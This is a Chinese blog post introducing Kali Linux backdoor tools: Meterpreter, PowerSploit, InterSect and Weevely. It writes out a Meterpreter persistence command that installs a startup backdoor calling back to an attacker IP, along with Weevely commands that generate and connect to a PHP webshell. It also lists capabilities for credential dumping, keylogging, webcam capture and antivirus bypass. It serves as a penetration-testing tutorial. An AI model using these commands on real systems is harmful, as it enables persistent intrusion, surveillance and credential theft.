1、Meterpreter

它是Metasploit框架中功能强大的后渗透模块。可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端。

命令        作用

sessions      查看会话ID信息

idletime     显示目标主机截止当前无操作命令的时间

webcam_snap   抓取目标主机的摄像头,将拍摄的内容保存到本地

run checkvm   检查目标主机是否是虚拟机

rdesktop     执行rdesktop -u username -p password ip 执行命令之后就会弹出一个窗口对目标进行控制

hashdump    获得密码的hash值

keylogrecorder  记录键盘信息

vnc       打开远程目标桌面

getsystem    目标系统权限提升

Meterpreter相当于攻击成功后驻留在内存中的Shellcode,为了保持长久的控制,metasplpoit提供了persistence和metsvc,模块,用于在目标为windows系统上安装开机运行或永久服务等后门。命令如下:

meterpreter>run persistence -X -i 5 -p 2000 -r 192.168.1.101          #在注册表中写入开机启动项,反向连接192.168.1.101:2000(攻击者的ip和端口) -X表示开机启动 ,-i表示反向连接间隔

meterpreter>run metsvc         #安装系统服务metsvc

2、PowerSpoit

基于PowerShell的后门集成框架。需要.Net环境支持。其主要模块:

1、CodeExecution 在目标主机执行代码

2、ScriptModification 在目标主机上创建或修改脚本

3、Persistence 设置后门,开机启动或安装服务等

4、AntivirusBypass 绕过杀毒软件

5、Exfiltration 在目标主机上进行信息搜集的工具

6、Mayhem 蓝屏等破坏性脚本

7、Recon 以目标主机为跳板进行内网侦查

3、InterSect

是一个后渗透完成多种后期任务的Python程序。它能够自动收集密码文件和网络信息,并且能够识别杀毒软件和防火墙程序。若需要使用它自动执行后期任务,需要创建自己的脚本文件,并在脚本中指定所需的各种功能,InterSect为每种功能提供对应的模块,其包含的功能模块:

1、creds 收集认证信息

2、extras 搜索操作系统和应用程序的配置文件,以检索特定的应用程序和防护程序

3、network 收集网络信息,例如服务端口和dns信息

4、lanmap 枚举在线主机并收集ip地址

5、osuser 枚举操作系统信息

6、openshares 在特定的主机上查找smb的公开共享

7、portscan 简易的端口扫描程序,可以扫描特定ip的1~1000端口

8、egressbuster 在指定的端口范围内,搜索可用的外联端口

9、privsec 检测Linux内核的系统是否存在可提权漏洞

10、xmlcrack 将哈希列表发送端远程XMLRPC,以继续破解

11、reversexor 采用异或加密的reverse shell

12、bshell 基于tcp协议的bind shell

13、rshell 基于tcp协议的reverse shell

14、xorshell 基于xor加密的bind shell

15、aeshttp 采用aes算法加密的HTTP reverse shell

16、udpbind 采用udp协议的bind shell,默认端口为 21541

17、persistent 会在系统启动时自动运行的持久型后门

4、Weevely

是一款功能强大的PHP后门工具,它使用HTTP协议包头部进行指令传输。它的使用非常简单,但仅支持php语言。

建立后门:weevely generate <password> <path> #password为自己设置的后门连接密码,path为存放生成的木马文件路径

连接后门:weevely <URL> <password> [cmd] #URL为后门地址,password为后门密码,cmd为可选项,表示要执行的命令

Kali Linux之常见后门工具介绍的更多相关文章

  1. Rsync,Linux日志及Screen工具介绍

    第十六次课 Rsync,Linux日志及Screen工具介绍 目录 一.rsync工具介绍 二.rsync常用选项 三.rsync通过ssh同步 四. rsync通过服务同步 五.linux系统日志 ...

  2. Linux 文件内容查看工具介绍-cat,less,more,tail,head

    Linux 文件内容查看工具介绍 作者:北南南北来自:LinuxSir.Org摘要: 本文讲述几种常用文件内容的查看工具,比如cat.more.less.head.tail等,把这些工具最常用的参数. ...

  3. Linux操作系统的打包/归档工具介绍

    Linux操作系统的打包/归档工具介绍 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任.

  4. Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter

    注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo.weevely.PHP Meterpreter,这类工 ...

  5. Kali linux渗透测试常用工具汇总1

    1.ProxyChains 简介:代理工具.支持HTTP/SOCKS4/SOCK5的代理服务器,允许TCP/DNS通过代理隧道. 应用场景:通过代理服务器上网. 配置:/etc/proxychains ...

  6. 关于kali linux系统的简单工具

    Linux系统中关于几个重要目录的原英文解释: /etc/: Contains configuration files of the installed tools /opt/: Contains M ...

  7. kali linux maltego-情报收集工具

    Maltego是一个交互式数据挖掘工具,它为链接分析呈现有向图.该工具用于在线调查,以发现互联网上各种来源的信息片段之间的关系. 注册Maltego账号,注册地址:https://www.paterv ...

  8. 【Linux】文本处理工具介绍

    文本处理工具介绍 grep.sed和awk都是文本处理工具,各自都有各自的优缺点,一种文本处理命令是不能被另一个完全替换的.相比较而言,sed和awk功能更强大,且已独立成一种语言来介绍. grep: ...

  9. linux /dev 常见特殊设备介绍与应用[loop,null,zero,full,random]

    linux是文件型系统,所有硬件如软件都会在对于的目录下面有相应的文件表示.对于dev这个目录,我们知道它下面的文件,表示的是linux的设备.在windows系统中,设备大家很好理解,象硬盘,磁盘指 ...

随机推荐

  1. Python学习day1 初识python&环境安装

    day1 环境安装-计算机基础 环境安装参见 https://blog.csdn.net/ling_mochen/article/details/79314118 1.markdown基本语法 htt ...

  2. iview tree 获取选中子节点的整条数据链

    这样子获取到数据是,checked等于true的,获取不到他的父级,父级的父级 解决办法代码如下: //需要有一个唯一ID //==================================== ...

  3. HEOI2013 Segment

    传说中的“李超树”. 大意:给你若干线段,试求横坐标x上的最上方一条线段的编号.无则输出零. 解:用线段树维护. 插入的时候保存自己这个区间上可能成为最大值的线段,被抛弃的则看情况下放. 查询时从最底 ...

  4. 再谈 javascript 数组去重

    前言 数组去重方法老生常谈,既然是常谈,我也来谈谈 双层循环 也许我们首先想到的是使用 indexOf 来循环判断一遍,但在这个方法之前,让我们先看看最原始的方法: var array = [1,1, ...

  5. netsh interface portproxy的一个简单例子

    netsh interface portproxy的微软帮助文档地址: https://technet.microsoft.com/zh-cn/library/cc776297(WS.10).aspx ...

  6. 在Java中调用与系统有关的剪切板Clipboard

    java从1.5版开始已经能与系统的剪切板很好的交互了. 如果可以在程序中直接调用系统的剪切板来保存“复制”的对象内容,那可以说的比之前的想法好很多. 下面是一个对java.io.File对象进行co ...

  7. react-native中的请求数据

    很多移动应用都需要从远程地址中获取数据或资源.你可能需要给某个 REST API 发起 POST 请求以提交用户数据,又或者可能仅仅需要从某个服务器上获取一些静态内容. 使用 Fetch React ...

  8. haploview画出所有SNP的LD关系图

    有时候我们想画出所有SNP的LD关系图,则需要在命令行添加“-skipcheck”命令行,如下所示: java -jar Haploview.jar -skipcheck -n -pedfile 80 ...

  9. Methods for follow-up research of exome analysis:外显子后续分析研究思路总结

    外显子后续分析研究思路一般有以下几种(Methods for follow-up research of exome analysis): 1.对突变频率.突变类型.突变方式进行统计分析 Mutati ...

  10. postman 抓包工具charles的使用

    1.直接打开charles,然后,如果有https的话,需要安装证书,然后,设置代理 2.如果不是https的,不需要设置代理,直接抓取就可以 先安装证书: 然后设置代理:               ...